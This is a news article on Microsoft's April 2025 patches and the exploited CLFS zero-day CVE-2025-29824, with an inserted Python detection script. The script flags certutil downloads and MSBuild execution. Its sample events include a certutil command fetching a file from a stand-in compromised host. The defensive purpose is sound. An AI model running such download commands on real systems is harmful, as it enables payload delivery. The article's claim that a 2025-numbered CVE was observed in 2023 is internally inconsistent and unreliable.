Microsoft's April 2025 Patch Tuesday tackles over 130 bugs, including actively exploited zero-day

Microsoft has released critical security updates for more than 130 flaws as part of its April 2025 Patch Tuesday. Most importantly, the updates address a zero-day flaw that is currently being exploited by threat actors.

The flaw, tracked as CVE-2025-29824, is a Windows Common Log File System (CLFS) Driver Elevation of Privilege Vulnerability. The vulnerability allows local attackers to escalate their privileges to SYSTEM level on the affected device, potentially giving them full control over the system.

Microsoft has confirmed that this vulnerability has been actively exploited in the wild, although the exploitation appears to be limited to a small number of specific targets. The affected sectors include IT and real estate firms in the US, the financial sector in Venezuela, a Spanish software company, and the retail industry in Saudi Arabia.

The exploitation of the flaw has been linked to the PipeMagic malware, a tool previously associated with several high-profile cyberattacks. Microsoft attributes the ongoing exploitation activity to the Storm-2460 threat group, which is also known for deploying ransomware using PipeMagic. Storm-2460 has a history of utilizing sophisticated techniques to gain initial access to target systems and move laterally within compromised environments.

Microsoft said it has yet to determine the exact initial access vectors, but it observed Storm-2460 using the certutil utility, a legitimate Windows tool, to download a malicious file from a compromised third-party website. The downloaded file contains an MSBuild script, which in turn carries an encrypted malware payload.

Once executed, the malware decrypts itself and leverages the EnumCalendarInfoA API callback to deliver the PipeMagic malware to the compromised system. In 2023, researchers from ESET observed threat actors using PipeMagic in connection with the exploitation of another zero-day vulnerability in the Win32k component, tracked as CVE-2025-24983.
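The chain described above (certutil fetching a file from a web site, then MSBuild executing the dropped script) leaves process-creation telemetry that a defender can match. The following is an added detection example, not code from Microsoft or the article: it runs two rules and one correlation over constructed process-creation events whose field names (image, cmdline) and sample paths are assumptions, not real telemetry from the campaign.

```python
import re

# Constructed sample process-creation events; paths and hostnames are invented for the example.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -f https://compromised-site.example/f.txt C:\Users\Public\f.txt"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\installer.msi SHA256"},  # benign certutil use
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\Public\f.txt"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Projects\app\app.csproj"},  # ordinary developer build
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Directories a normal build never runs from but a dropped file usually lands in.
USER_WRITABLE_RE = re.compile(
    r"\\(Users\\Public|Users\\[^\\]+\\AppData|Windows\\Temp|ProgramData)\\", re.IGNORECASE)

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the per-event rules this event matches (empty if none)."""
    hits = []
    name = image_name(event["image"])
    cmd = event["cmdline"]
    if name == "certutil.exe" and URL_RE.search(cmd):
        hits.append("certutil_remote_download")
    if name == "msbuild.exe" and USER_WRITABLE_RE.search(cmd):
        hits.append("msbuild_project_in_user_writable_dir")
    return hits

def scan(events):
    """Apply the rules in order and additionally flag an MSBuild run whose
    argument is a file certutil fetched earlier in the same event stream."""
    alerts, downloaded = [], set()
    for e in events:
        hits = classify(e)
        tokens = e["cmdline"].split()  # assumption: no quoted paths with spaces
        if "certutil_remote_download" in hits:
            downloaded.add(tokens[-1].lower())  # certutil's trailing argument is the output file
        if image_name(e["image"]) == "msbuild.exe":
            if any(t.lower() in downloaded for t in tokens[1:]):
                hits.append("msbuild_runs_certutil_download")
        if hits:
            alerts.append((e["cmdline"], hits))
    return alerts
```

On the sample stream the hashfile call and the developer build produce no alert, while the download and the MSBuild run of the downloaded file are both flagged, the latter with the correlation rule as well.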

As of now, Microsoft has released security patches for Windows Server and Windows 11 systems to address the CVE-2025-29824 vulnerability. Windows 10 users will have to wait for a subsequent update, with patches expected to be made available at a later date.
